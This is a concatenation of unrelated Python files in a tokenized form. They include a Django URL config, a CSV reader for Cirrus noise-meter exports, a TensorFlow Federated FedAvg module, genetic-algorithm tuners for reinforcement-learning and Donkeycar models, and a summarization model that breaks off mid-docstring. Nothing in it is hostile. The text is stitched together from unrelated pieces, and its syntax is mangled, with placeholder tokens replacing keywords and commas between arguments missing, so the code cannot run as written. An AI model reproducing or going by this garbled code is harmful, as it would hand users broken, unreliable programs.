# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com) c=(a b)<line_sep>d={e:1 f:2}<line_sep>fun(a b *c **d)<line_sep># EXPECTED: [<ellipsis> BUILD_TUPLE(2) <ellipsis> BUILD_TUPLE_UNPACK_WITH_CALL(2) <ellipsis> CALL_FUNCTION_EX(1) <ellipsis> ]<line_sep>
<import_stmt>django.contrib.sitemaps.views<import_stmt>django.views.i18n<import_stmt>django.views.static<import_from_stmt>django.conf settings<import_from_stmt>django.contrib admin<import_from_stmt>django.contrib.sitemaps.views sitemap<as>sitemap_view<import_from_stmt>django.urls include<import_from_stmt>django.urls re_path<as>url<import_from_stmt>django.views.decorators.cache cache_page<line_sep>urlpatterns=[url(r"^media/(?P<path>.*)$" django.views.static.serve # NOQA {"document_root":settings.MEDIA_ROOT "show_indexes":<true>} ) url(r"^admin/" admin.site.urls) # NOQA url(r"^/" include("robots.urls")) # NOQA url(r"^sitemap.xml$" sitemap_view {"sitemaps":[]}) url(r"^other/sitemap.xml$" cache_page(60)(sitemap_view) {"sitemaps":[]} name="cached-sitemap" ) ]<line_sep>
""" Cirrus ====== Handle Cirrus data. """<import_stmt>csv<import_stmt>io<import_stmt>re<import_stmt>pandas<as>pd<def_stmt>read_csv_cirrus filename# pylint: disable=too-many-locals <block_start>"""Read a Cirrus CSV file. Currently exists support for some types of CSV files extracted with NoiseTools. There is no support for CSVs related with occupational noise. If there are NC and NR values in the csv file, they will be stored in the returned object with attributes ``nc`` and ``nr``. If the CSV file contains time history, you can access to date and time with the ``time`` attribute. Also, it is possible to know the integration time with the ``integration_time`` attribute. :param filename: CSV file name. :returns: Pandas dataframe with all data extracted from the CSV file. :rtype: Pandas dataframe. """<with_stmt>open(filename "r")<as>csvfile<block_start>csvreader=csvfile.read()<line_sep>csvreader=re.sub(r" dB" "" csvreader)# Clean " dB" from data dialect=csv.Sniffer().sniff(csvreader delimiters=",;")<line_sep>separator=dialect.delimiter<line_sep># Guess decimal separator decimal_sep=re.search(r"\"\d{2,3}"<concat>r"(\.|,)"# Decimal separator <concat>r"\d{1,2}\"" csvreader ).group(1)<block_end>n_cols=re.search("(.+)\n" csvreader).group(1).count(separator)+1<if_stmt>n_cols<l>5<block_start>unsorted_data=[]<line_sep>pdindex=["Z"]<for_stmt>i,c enumerate(csvreader.splitlines())<block_start><if_stmt>c[:4]<eq>'"NR"'<block_start>nr=int(re.search(r"\d{2}" c).group(0))<line_sep><continue><block_end><elif_stmt>c[:4]<eq>'"NC"'<block_start>nc=int(re.search(r"\d{2}" c).group(0))<line_sep><continue><block_end><if_stmt>i<ne>0<block_start>unsorted_data.append(c.split(separator))<block_end><else_stmt><block_start><if_stmt>n_cols<eq>3<block_start>pdindex.append(c[-2:-1])<block_end><elif_stmt>n_cols<eq>4<block_start>pdindex.append("A")<line_sep>pdindex.append("C")<block_end><block_end><block_end># Create a sorted temporary csv-like file csv_data=list(zip(*unsorted_data))<line_sep>temp_csv=""<for_stmt>row csv_data<block_start>temp_csv<augadd>separator.join(row)+"\n"<block_end># Then, read it with pandas data=pd.read_csv(io.StringIO(temp_csv) sep=separator decimal=decimal_sep )<line_sep># Assign NC and NR data if they are present <try_stmt><block_start>data.nc=nc<line_sep>data.nr=nr<block_end># TODO specify exception type: <except_stmt># pylint: disable=bare-except <block_start><pass><block_end># If the csv file contains global data from the "Details" tab in # NoiseTools, skip row names <if_stmt>n_cols<ne>2<block_start>data.index=pdindex<block_end><block_end><else_stmt><block_start>data=pd.read_csv(filename parse_dates=[[0 1]] sep=separator decimal=decimal_sep )<line_sep># Fix time name column en_columns=data.columns.values<line_sep>en_columns[0]="time"<line_sep>data.columns=en_columns<line_sep># Guess integration time with statistical mode because the csv could # have been cleaned from unwanted noise data["time"]=pd.to_datetime(data.time)<line_sep>delta=data.time.diff().fillna(0.0)<line_sep># Mode and change from ns to s int_time=int(delta.mode().astype(int)<times>1e-9)<if_stmt>round(int_time 2)<eq>0.06# Fix for 1/16 s <block_start>int_time=0.0625<block_end>data.integration_time=int_time<block_end><return>data<block_end>
# Copyright 2020, The TensorFlow Federated Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """An implementation of the FedAvg algorithm with stateful clients. The TF functions for sever and client udpates. """<import_stmt>collections<import_from_stmt>typing Union<import_stmt>attr<import_stmt>tensorflow<as>tf<import_stmt>tensorflow_federated<as>tff<line_sep>ModelWeights=collections.namedtuple('ModelWeights' 'trainable non_trainable')<line_sep>ModelOutputs=collections.namedtuple('ModelOutputs' 'loss')<def_stmt>get_model_weights model:Union[tff.learning.Model 'KerasModelWrapper']<arrow>Union[tff.learning.ModelWeights ModelWeights]<block_start>"""Gets the appropriate ModelWeights object based on the model type."""<if_stmt>isinstance(model tff.learning.Model)<block_start><return>tff.learning.ModelWeights.from_model(model)<block_end><else_stmt># Using simple_fedavg custom Keras wrapper. <block_start><return>model.weights<block_end><block_end><class_stmt>KerasModelWrapper(object)<block_start>"""A standalone keras wrapper to be used in TFF."""<def_stmt>__init__ self keras_model input_spec loss<block_start>"""A wrapper class that provides necessary API handles for TFF. Args: keras_model: A `tf.keras.Model` to be trained. input_spec: Metadata of dataset that desribes the input tensors, which will be converted to `tff.Type` specifying the expected type of input and output of the model. loss: A `tf.keras.losses.Loss` instance to be used for training. """<line_sep>self.keras_model=keras_model<line_sep>self.input_spec=input_spec<line_sep>self.loss=loss<block_end><def_stmt>forward_pass self batch_input training=<true><block_start>"""Forward pass of the model to get loss for a batch of data. Args: batch_input: A `collections.abc.Mapping` with two keys, `x` for inputs and `y` for labels. training: Boolean scalar indicating training or inference mode. Returns: A scalar tf.float32 `tf.Tensor` loss for current batch input. """<line_sep>preds=self.keras_model(batch_input['x'] training=training)<line_sep>loss=self.loss(batch_input['y'] preds)<line_sep><return>ModelOutputs(loss=loss)<block_end>@property<def_stmt>weights self<block_start><return>ModelWeights(trainable=self.keras_model.trainable_variables non_trainable=self.keras_model.non_trainable_variables)<block_end><def_stmt>from_weights self model_weights<block_start>tf.nest.map_structure(<lambda>v t:v.assign(t) self.keras_model.trainable_variables list(model_weights.trainable))<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) self.keras_model.non_trainable_variables list(model_weights.non_trainable))<block_end><block_end><def_stmt>keras_evaluate model test_data metric<block_start>metric.reset_states()<for_stmt>batch test_data<block_start>preds=model(batch['x'] training=<false>)<line_sep>metric.update_state(y_true=batch['y'] y_pred=preds)<block_end><return>metric.result()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>ClientState(object)<block_start>"""Structure for state on the client. Fields: - `client_index`: The client index integer to map the client state back to the database hosting client states in the driver file. - `iters_count`: The number of total iterations a client has computed in the total rounds so far. """<line_sep>client_index=attr.ib()<line_sep>iters_count=attr.ib()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>ClientOutput(object)<block_start>"""Structure for outputs returned from clients during federated optimization. Fields: - `weights_delta`: A dictionary of updates to the model's trainable variables. - `client_weight`: Weight to be used in a weighted mean when aggregating `weights_delta`. - `model_output`: A structure matching `tff.learning.Model.report_local_outputs`, reflecting the results of training on the input dataset. - `client_state`: The updated `ClientState`. """<line_sep>weights_delta=attr.ib()<line_sep>client_weight=attr.ib()<line_sep>model_output=attr.ib()<line_sep>client_state=attr.ib()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>ServerState(object)<block_start>"""Structure for state on the server. Fields: - `model_weights`: A dictionary of model's trainable variables. - `optimizer_state`: Variables of optimizer. - 'round_num': Current round index - `total_iters_count`: The total number of iterations run on seen clients """<line_sep>model_weights=attr.ib()<line_sep>optimizer_state=attr.ib()<line_sep>round_num=attr.ib()<line_sep>total_iters_count=attr.ib()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>BroadcastMessage(object)<block_start>"""Structure for tensors broadcasted by server during federated optimization. Fields: - `model_weights`: A dictionary of model's trainable tensors. - `round_num`: Round index to broadcast. We use `round_num` as an example to show how to broadcast auxiliary information that can be helpful on clients. It is not explicitly used, but can be applied to enable learning rate scheduling. """<line_sep>model_weights=attr.ib()<line_sep>round_num=attr.ib()<block_end>@tf.function<def_stmt>server_update model server_optimizer server_state weights_delta total_iters_count<block_start>"""Updates `server_state` based on `weights_delta`. Args: model: A `KerasModelWrapper` or `tff.learning.Model`. server_optimizer: A `tf.keras.optimizers.Optimizer`. If the optimizer creates variables, they must have already been created. server_state: A `ServerState`, the state to be updated. weights_delta: A nested structure of tensors holding the updates to the trainable variables of the model. total_iters_count: A scalar to update `ServerState.total_iters_count`. Returns: An updated `ServerState`. """<line_sep># Initialize the model with the current state. model_weights=get_model_weights(model)<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) model_weights server_state.model_weights)<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) server_optimizer.variables() server_state.optimizer_state)<line_sep># Apply the update to the model. neg_weights_delta=[-1.0<times>x<for>x weights_delta]<line_sep>server_optimizer.apply_gradients(zip(neg_weights_delta model_weights.trainable) name='server_update')<line_sep># Create a new state based on the updated model. <return>tff.structure.update_struct(server_state model_weights=model_weights optimizer_state=server_optimizer.variables() round_num=server_state.round_num+1 total_iters_count=total_iters_count)<block_end>@tf.function<def_stmt>build_server_broadcast_message server_state<block_start>"""Build `BroadcastMessage` for broadcasting. This method can be used to post-process `ServerState` before broadcasting. For example, perform model compression on `ServerState` to obtain a compressed state that is sent in a `BroadcastMessage`. Args: server_state: A `ServerState`. Returns: A `BroadcastMessage`. """<line_sep><return>BroadcastMessage(model_weights=server_state.model_weights round_num=server_state.round_num)<block_end>@tf.function<def_stmt>client_update model dataset client_state server_message client_optimizer<block_start>"""Performans client local training of `model` on `dataset`. Args: model: A `tff.learning.Model`. dataset: A 'tf.data.Dataset'. client_state: A 'ClientState'. server_message: A `BroadcastMessage` from server. client_optimizer: A `tf.keras.optimizers.Optimizer`. Returns: A 'ClientOutput`. """<line_sep>model_weights=get_model_weights(model)<line_sep>initial_weights=server_message.model_weights<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) model_weights initial_weights)<line_sep>num_examples=tf.constant(0 dtype=tf.int32)<line_sep>loss_sum=tf.constant(0 dtype=tf.float32)<line_sep>iters_count=tf.convert_to_tensor(client_state.iters_count)<for_stmt>batch dataset<block_start><with_stmt>tf.GradientTape()<as>tape<block_start>outputs=model.forward_pass(batch)<block_end>grads=tape.gradient(outputs.loss model_weights.trainable)<line_sep>client_optimizer.apply_gradients(zip(grads model_weights.trainable))<line_sep>batch_size=(tf.shape(batch['x'])[0])<line_sep>num_examples<augadd>batch_size<line_sep>loss_sum<augadd>outputs.loss<times>tf.cast(batch_size tf.float32)<line_sep>iters_count<augadd>1<block_end>weights_delta=tf.nest.map_structure(<lambda>a b:a-b model_weights.trainable initial_weights.trainable)<line_sep>client_weight=tf.cast(num_examples tf.float32)<line_sep><return>ClientOutput(weights_delta client_weight loss_sum/client_weight ClientState(client_index=client_state.client_index iters_count=iters_count))<block_end>
<import_stmt>argparse<import_from_stmt>genrl A2C PPO1<import_from_stmt>genrl.deep.common OnPolicyTrainer<import_from_stmt>genrl.deep.common.actor_critic MlpActorCritic<import_from_stmt>genrl.deep.common.utils get_env_properties<import_from_stmt>genrl.environments VectorEnv<import_from_stmt>genrl.evolutionary GeneticHyperparamTuner<line_sep># """ # Okay so parameters to tune:- # - layers # - lr_policy # - lr_value # - clip param # - entropy coeff # - value coeff # - gamma # """ <def_stmt>get_logger log<block_start><if_stmt>","<not><in>log<block_start><return>[log]<block_end><else_stmt><block_start>log=log.split(",")<if_stmt>""<in>log<or>" "<in>log<block_start>log=[i<for>i log<if>i<ne>""]<line_sep>log=[i<for>i log<if>i<ne>" "]<block_end><return>log<block_end><block_end># Code inspired from https://github.com/harvitronix/neural-network-genetic-algorithm <class_stmt>GATuner(GeneticHyperparamTuner)<block_start><def_stmt>fitness self agent<block_start>""" Return the mean rewards, which is our fitness function """<line_sep><return>agent.get_logging_params()["mean_reward"]<block_end><block_end><def_stmt>train_population agents envirnment args<block_start>""" Train all the agents in the population Args: agents (List) : List of agent envirnment: Gym envirnment """<line_sep>logger=get_logger(args.log)<for_stmt>agent agents<block_start>trainer=OnPolicyTrainer(agent envirnment logger epochs=args.epochs render=args.render log_interval=args.log_interval )<line_sep>trainer.train()<del_stmt>trainer<line_sep>print("-"<times>80)<block_end><block_end><def_stmt>generate generations no_of_parents agent_parameter_choices envirnment generic_agent args<block_start>""" Genetic Algorithm for RL Args: generations (int): No of generations no_of_parents(int): No of agents in a generation agent_parameter_choices(Dict): Parameter choices for the agent envirnment: Gym Envirnment generic_agent : RL Agent to be tuned """<line_sep>optimizer=GATuner(agent_parameter_choices)<line_sep>agents=optimizer.initialize_population(no_of_parents generic_agent)<line_sep># evolve the generation <for_stmt>i range(generations)<block_start>print(f"Doing generation {i}/{generations}")<line_sep># Train the agents train_population(agents envirnment args)<line_sep># get average fitness of the generation avg_reward=optimizer.grade(agents)<line_sep>print(f"Generation avg reward:{avg_reward}")<line_sep>print("-"<times>50)<line_sep># Evolve the generation <if_stmt>i<ne>generations-1<block_start>agents=optimizer.evolve(agents)<block_end><block_end># sort our final population agents=sorted(agents key=<lambda>x:optimizer.fitness(x) reverse=<true>)<line_sep># print rewards of top 5 <for_stmt>i range(5)<block_start>print(f"Top {i+1} agent reward: {optimizer.fitness(agents[i])}")<block_end><block_end><def_stmt>main args<block_start>env=VectorEnv(args.env n_envs=args.n_envs parallel=<not>args.serial env_type=args.env_type)<line_sep>input_dim,action_dim,discrete,action_lim=get_env_properties(env "mlp")<line_sep>network=MlpActorCritic(input_dim action_dim (1 1) # layers (1 1) "V" # type of value function discrete action_lim=action_lim activation="relu" )<line_sep>generic_agent=A2C(network env rollout_size=args.rollout_size)<line_sep>agent_parameter_choices={"gamma":[12 121] # 'clip_param': [0.2, 0.3], # 'lr_policy': [0.001, 0.002], # 'lr_value': [0.001, 0.002] }<line_sep>generate(args.generations args.population agent_parameter_choices env generic_agent args )<block_end><if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser(description="Train Deep RL algorithms")<line_sep># parser.add_argument("-a", "--algo", help="Which Algo to train", default="ppo", type=str) parser.add_argument("-e" "--env" help="Which env to train on" default="CartPole-v0" type=str)<line_sep>parser.add_argument("--env-type" help="What kind of env is it" default="gym" type=str)<line_sep>parser.add_argument("-n" "--n-envs" help="Number of vectorized envs to train on" default=2 type=int )<line_sep>parser.add_argument("--serial" help="Vectorized envs should be serial or parallel" default=<true> type=bool )<line_sep>parser.add_argument("--epochs" help="How many epochs to train on" default=20 type=int)<line_sep>parser.add_argument("--render" help="Should the env be rendered" default=<false> action="store_true" )<line_sep>parser.add_argument("--log" help="Comma separated string of logs" default="stdout" type=str)<line_sep>parser.add_argument("--arch" help="Which architecture mlp/cnn for now" default="mlp" type=str)<line_sep>parser.add_argument("--log-interval" help="Set Log interval" default=50 type=int)<line_sep>parser.add_argument("--batch-size" help="Batch Size" default=128 type=int)<line_sep>parser.add_argument("--population" help="No. of agents in a generation" default=10 type=int)<line_sep>parser.add_argument("--generations" help="No. of generations" default=5 type=int)<line_sep>offpolicyargs=parser.add_argument_group("Off Policy Args")<line_sep>offpolicyargs.add_argument("-ws" "--warmup-steps" help="Warmup steps" default=10000 type=int)<line_sep>offpolicyargs.add_argument("--replay-size" help="Replay Buffer Size" default=1000 type=int)<line_sep>onpolicyargs=parser.add_argument_group("On Policy Args")<line_sep>onpolicyargs.add_argument("--rollout-size" help="Rollout Buffer Size" default=2048 type=int)<line_sep>args=parser.parse_args()<line_sep>main(args)<block_end>
""" file: simple_gen.py author: <NAME> date: 17 May 2020 notes: a most basic implementation of genetic cross breeding and mutation to attempt to improve a neural network. Assumes the standard Keras model from Donkeycar project. Lower score means less loss = better. """<import_stmt>argparse<import_stmt>json<import_stmt>os<import_stmt>time<import_stmt>warnings<import_stmt>numpy<as>np<import_from_stmt>PIL Image<line_sep># noisy, noisy tensorflow. we love you. os.environ["TF_CPP_MIN_LOG_LEVEL"]="3"<with_stmt>warnings.catch_warnings()<block_start>warnings.filterwarnings("ignore" category=FutureWarning)<import_stmt>tensorflow<as>tf<block_end>tf.logging.set_verbosity(tf.logging.ERROR)<class_stmt>IAgent<block_start><def_stmt>begin self<block_start><pass><block_end><def_stmt>wait self<block_start><pass><block_end><def_stmt>get_score self<block_start><pass><block_end><def_stmt>make_new self parent1 parent2<block_start><return>IAgent()<block_end><block_end><class_stmt>GeneticAlg<block_start><def_stmt>__init__ self population conf={}<block_start>self.population=population<line_sep>self.conf=conf<block_end><def_stmt>finished self<block_start><return><false><block_end><def_stmt>process self num_iter<block_start>iIter=0<while_stmt><not>self.finished()<and>iIter<l>num_iter<block_start>print("starting epoch" iIter)<line_sep>s=time.time()<line_sep>self.evaluate_agents()<line_sep>self.on_agents_finished()<line_sep>e=time.time()-s<line_sep>self.breed_agents()<line_sep>iIter<augadd>1<line_sep>d=time.time()-s<line_sep># Time per iteration getting worse?! print("finish epoch" iIter)<line_sep>print("Iter %d eval time: %f total time: %f"%(iIter e d))<block_end><block_end><def_stmt>on_agents_finished self<block_start><pass><block_end><def_stmt>evaluate_agents self<block_start><for_stmt>agent self.population<block_start>agent.begin()<block_end><for_stmt>agent self.population<block_start>agent.wait()<block_end>self.sort_agents()<line_sep># progress print("scores:" [a.score<for>a self.population])<block_end><def_stmt>how_many_to_keep self<block_start><return>round(len(self.population)/4)+1<block_end><def_stmt>breed_agents self<block_start>""" keep the best N of our population and replace the rest with versions cross bred from other agents. """<line_sep>keep=self.how_many_to_keep()<line_sep>num_new=len(self.population)-keep<line_sep>pop_to_keep=self.population[0:keep]<line_sep>new_population=[]<for_stmt>_ range(num_new)<block_start>p1,p2=self.select_parents()<line_sep>new_agent=p1.make_new(p1 p2)<line_sep>new_agent.mutate()<line_sep>new_population.append(new_agent)<block_end>self.population=pop_to_keep+new_population<block_end><def_stmt>sort_agents self<block_start>self.population.sort(key=<lambda>x:x.get_score() reverse=<false>)<block_end><def_stmt>select_pop_index self<block_start>r=np.random.uniform(low=0.0 high=1.0)<line_sep>N=len(self.population)<line_sep>iP=round(r<times>N)%N<line_sep><return>iP<block_end><def_stmt>select_parents self<block_start>iP1=self.select_pop_index()<line_sep>iP2=self.select_pop_index()<line_sep># hack, always select the best 2 # iP1 = 0 # iP2 = 1 # lets make sure parents are not the same <while_stmt>iP2<eq>iP1<block_start>iP2=self.select_pop_index()<block_end><return>self.population[iP1] self.population[iP2]<block_end><block_end><class_stmt>NNAgent(IAgent)<block_start><def_stmt>__init__ self model conf<block_start>self.model=model<line_sep>self.score=0.0<line_sep>self.conf=conf<block_end><def_stmt>begin self<block_start>self.score=0.0<block_end><def_stmt>wait self<block_start><pass><block_end><def_stmt>get_score self<block_start><return>self.score<block_end><def_stmt>mutate self<block_start><pass><block_end><def_stmt>breed self agent1 agent2<block_start><return>agent1.model<block_end><def_stmt>make_new self parent1 parent2<block_start>new_model=self.breed(parent1 parent2)<line_sep>agent=NNAgent(new_model self.conf)<line_sep>agent.mutate()<line_sep><return>agent<block_end><block_end><class_stmt>KerasNNAgent(NNAgent)<block_start><def_stmt>__init__ self model conf<block_start>super().__init__(model conf)<line_sep>self.mutation_rate=conf["mutation_rate"]<block_end><def_stmt>mutate self<block_start>layers_to_mutate=self.conf["layers_to_mutate"]<for_stmt>iLayer layers_to_mutate<block_start>layer=self.model.get_layer(index=iLayer)<line_sep>w=layer.get_weights()<line_sep>self.modify_weights(w)<line_sep>layer.set_weights(w)<block_end>self.decay_mutations()<block_end><def_stmt>rand_float self mn mx<block_start><return>float(np.random.uniform(mn mx 1)[0])<block_end><def_stmt>modify_weights self w<block_start>mx=self.conf["mutation_max"]<line_sep>mn=self.conf["mutation_min"]<line_sep>mag=self.rand_float(mn mx)<for_stmt>iArr,arr enumerate(w)<block_start>val=self.rand_float(0.0 1.0)<if_stmt>val<g>self.mutation_rate<block_start><continue><block_end>random_values=np.random.uniform(-mag mag arr.shape)<line_sep>arr=arr+random_values<line_sep>w[iArr]=arr<block_end><return>w<block_end><def_stmt>decay_mutations self<block_start>self.conf["mutation_max"]<augmul>self.conf["mutation_decay"]<block_end><def_stmt>breed self agent1 agent2<block_start>model1,model2=agent1.model agent2.model<line_sep>jsm=model1.to_json()<line_sep>new_model=tf.keras.models.model_from_json(jsm)<line_sep>new_model.set_weights(model1.get_weights())<line_sep>iLayers=self.conf["layers_to_combine"]<for_stmt>iLayer iLayers<block_start>layer1=model1.get_layer(index=iLayer)<line_sep>layer2=model2.get_layer(index=iLayer)<line_sep>final_layer=new_model.get_layer(index=iLayer)<line_sep>self.merge_layers(final_layer layer1 layer2)<block_end><return>new_model<block_end><def_stmt>merge_layers self dest_layer src1_layer src2_layer<block_start>w1=src1_layer.get_weights()<line_sep>w2=src2_layer.get_weights()<line_sep>res=w1.copy()<if_stmt>type(w1)<is>list<block_start>half=round(len(w1)/2)<line_sep>res[half:-1]=w2[half:-1]<block_end><else_stmt><block_start>l_indices=np.tril_indices_from(w2)<line_sep>res[l_indices]=w2[l_indices]<block_end>dest_layer.set_weights(res)<block_end><block_end><class_stmt>KerasNNImageAgent(KerasNNAgent)<block_start>""" Given an image and a target prediction, make an agent that will optimize for score of target. """<def_stmt>__init__ self model conf<block_start>super().__init__(model conf)<line_sep>self.image=conf["image"]<line_sep>self.target=conf["target"]<block_end><def_stmt>begin self<block_start>pred=self.model.predict(self.image)<line_sep>self.score=np.sum(np.absolute(pred-self.target))<block_end><def_stmt>make_new self parent1 parent2<block_start>new_model=self.breed(parent1 parent2)<line_sep>agent=KerasNNImageAgent(new_model self.conf)<line_sep>agent.mutate()<line_sep><return>agent<block_end><block_end><def_stmt>test_image_agent model_filename record_filename num_agents num_iter<block_start><with_stmt>open(os.path.expanduser(record_filename) "r")<as>fp<block_start>record=json.load(fp)<block_end>img_filename=os.path.join(os.path.dirname(record_filename) record["cam/image_array"])<line_sep>img=Image.open(os.path.expanduser(img_filename))<line_sep>img_arr=np.array(img)<line_sep># Our model was trained with this normalization scale on data. one_byte_scale=1.0/255.0<line_sep>img_arr=img_arr.astype(np.float32)<times>one_byte_scale<line_sep>img_arr=img_arr.reshape((1 )+img_arr.shape)<line_sep>steering=record["user/angle"]<line_sep>throttle=record["user/throttle"]<line_sep>target=np.array([np.array([[steering]]) np.array([[throttle]])])<line_sep># These are the final two dense layers we will mutate. We will use the same two layers we breeding. to_mutate=[14 16]<line_sep>conf={"layers_to_mutate":to_mutate}<line_sep>conf["layers_to_combine"]=to_mutate<line_sep>conf["mutation_rate"]=1.0<line_sep>conf["mutation_max"]=0.3<line_sep>conf["mutation_min"]=0.0<line_sep>conf["mutation_decay"]=1.0<line_sep>conf["image"]=img_arr<line_sep>conf["target"]=target<line_sep>population=[]<for_stmt>i range(num_agents)<block_start>model=tf.keras.models.load_model(os.path.expanduser(model_filename))<line_sep>agent=KerasNNImageAgent(model conf)<if_stmt>i<g>0<block_start>agent.mutate()<block_end>population.append(agent)<block_end># Some initial state print("target: steering: %f throttle: %f"%(target[0][0][0] target[1][0][0]))<line_sep>agent=population[0]<line_sep>agent.begin()<line_sep>print("initial score:" agent.score)<line_sep>pred=agent.model.predict(img_arr)<line_sep>print("initial pred" pred[0][0] pred[1][0])<line_sep># Try to improve alg=GeneticAlg(population)<line_sep>alg.process(num_iter=num_iter)<line_sep># Our best agent agent=alg.population[0]<line_sep>print("final score:" agent.score)<line_sep>pred=agent.model.predict(img_arr)<line_sep>print("final pred" pred[0][0] pred[1][0])<block_end><if_stmt>__name__<eq>"__main__"# Example: python ~\projects\gym-donkeycar\examples\genetic_alg\simple_gen.py # --model models\lane_keeper.h5 --record data\tub_6_20-05-16\record_2000.json <block_start>parser=argparse.ArgumentParser(description="simple_gen")<line_sep>parser.add_argument("--model" type=str help=".h5 model produced by donkeycar. expects the default linear model type.")<line_sep>parser.add_argument("--record" type=str help="donkey json record to use for training")<line_sep>parser.add_argument("--num_agents" type=int default=8 help="how many agents in our population")<line_sep>parser.add_argument("--num_iter" type=int default=8 help="how many generations before we stop")<line_sep>args=parser.parse_args()<line_sep># only needed if TF==1.13.1 # config = tf.ConfigProto() # config.gpu_options.allow_growth = True # sess = tf.Session(config=config) # K.set_session(sess) test_image_agent(model_filename=args.model record_filename=args.record num_agents=args.num_agents num_iter=args.num_iter)<block_end>
#################################### # Author: <NAME> # Date: September 2016 # Project: Document Summarization # H2020 Summa Project #################################### """ Document Summarization Modules and Models """<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.python.ops variable_scope<import_from_stmt>tensorflow.python.ops seq2seq<import_from_stmt>tensorflow.python.ops math_ops<line_sep># from tf.nn import variable_scope <import_from_stmt>my_flags FLAGS<import_from_stmt>model_utils *<line_sep>### Various types of extractor <def_stmt>sentence_extractor_nonseqrnn_noatt sents_ext encoder_state<block_start>"""Implements Sentence Extractor: No attention and non-sequential RNN Args: sents_ext: Embedding of sentences to label for extraction encoder_state: encoder_state Returns: extractor output and logits """<line_sep># Define Variables weight=variable_on_cpu('weight' [FLAGS.size FLAGS.target_label_size] tf.random_normal_initializer())<line_sep>bias=variable_on_cpu('bias' [FLAGS.target_label_size] tf.random_normal_initializer())<line_sep># Get RNN output rnn_extractor_output,_=simple_rnn(sents_ext initial_state=encoder_state)<with_stmt>variable_scope.variable_scope("Reshape-Out")<block_start>rnn_extractor_output=reshape_list2tensor(rnn_extractor_output FLAGS.max_doc_length FLAGS.size)<line_sep># Get Final logits without softmax extractor_output_forlogits=tf.reshape(rnn_extractor_output [-1 FLAGS.size])<line_sep>logits=tf.matmul(extractor_output_forlogits weight)+bias<line_sep># logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] logits=tf.reshape(logits [-1 FLAGS.max_doc_length FLAGS.target_label_size])<block_end><return>rnn_extractor_output logits<block_end><def_stmt>sentence_extractor_nonseqrnn_titimgatt sents_ext encoder_state titleimages<block_start>"""Implements Sentence Extractor: Non-sequential RNN with attention over title-images Args: sents_ext: Embedding of sentences to label for extraction encoder_state: encoder_state titleimages: Embeddings of title and images in the document Returns: extractor output and logits """<line_sep># Define Variables weight=variable_on_cpu('weight' [FLAGS.size FLAGS.target_label_size] tf.random_normal_initializer())<line_sep>bias=variable_on_cpu('bias' [FLAGS.target_label_size] tf.random_normal_initializer())<line_sep># Get RNN output rnn_extractor_output,_=simple_attentional_rnn(sents_ext titleimages initial_state=encoder_state)<with_stmt>variable_scope.variable_scope("Reshape-Out")<block_start>rnn_extractor_output=reshape_list2tensor(rnn_extractor_output FLAGS.max_doc_length FLAGS.size)<line_sep># Get Final logits without softmax extractor_output_forlogits=tf.reshape(rnn_extractor_output [-1 FLAGS.size])<line_sep>logits=tf.matmul(extractor_output_forlogits weight)+bias<line_sep># logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] logits=tf.reshape(logits [-1 FLAGS.max_doc_length FLAGS.target_label_size])<block_end><return>rnn_extractor_output logits<block_end><def_stmt>sentence_extractor_seqrnn_docatt sents_ext encoder_outputs encoder_state sents_labels<block_start>"""Implements Sentence Extractor: Sequential RNN with attention over sentences during encoding Args: sents_ext: Embedding of sentences to label for extraction encoder_outputs, encoder_state sents_labels: Gold sent labels for training Returns: extractor output and logits """<line_sep># Define MLP Variables weights={'h1':variable_on_cpu('weight_1' [2<times>FLAGS.size FLAGS.size] tf.random_normal_initializer()) 'h2':variable_on_cpu('weight_2' [FLAGS.size FLAGS.size] tf.random_normal_initializer()) 'out':variable_on_cpu('weight_out' [FLAGS.size FLAGS.target_label_size] tf.random_normal_initializer())}<line_sep>biases={'b1':variable_on_cpu('bias_1' [FLAGS.size] tf.random_normal_initializer()) 'b2':variable_on_cpu('bias_2' [FLAGS.size] tf.random_normal_initializer()) 'out':variable_on_cpu('bias_out' [FLAGS.target_label_size] tf.random_normal_initializer())}<line_sep># Shift sents_ext for RNN <with_stmt>variable_scope.variable_scope("Shift-SentExt")# Create embeddings for special symbol (lets assume all 0) and put in the front by shifting by one <block_start>special_tensor=tf.zeros_like(sents_ext[0])# tf.ones_like(sents_ext[0]) sents_ext_shifted=[special_tensor]+sents_ext[:-1]<block_end># Reshape sents_labels for RNN (Only used for cross entropy training) <with_stmt>variable_scope.variable_scope("Reshape-Label")# only used for training <block_start>sents_labels=reshape_tensor2list(sents_labels FLAGS.max_doc_length FLAGS.target_label_size)<block_end># Define Sequential Decoder extractor_outputs,logits=jporg_attentional_seqrnn_decoder(sents_ext_shifted encoder_outputs encoder_state sents_labels weights biases)<line_sep># Final logits without softmax <with_stmt>variable_scope.variable_scope("Reshape-Out")<block_start>logits=reshape_list2tensor(logits FLAGS.max_doc_length FLAGS.target_label_size)<line_sep>extractor_outputs=reshape_list2tensor(extractor_outputs FLAGS.max_doc_length 2<times>FLAGS.size)<block_end><return>extractor_outputs logits<block_end><def_stmt>policy_network vocab_embed_variable document_placeholder label_placeholder<block_start>"""Build the policy core network. Args: vocab_embed_variable: [vocab_size, FLAGS.wordembed_size], embeddings without PAD and UNK document_placeholder: [None,(FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.max_sent_length] label_placeholder: Gold label [None, FLAGS.max_doc_length, FLAGS.target_label_size], only used during 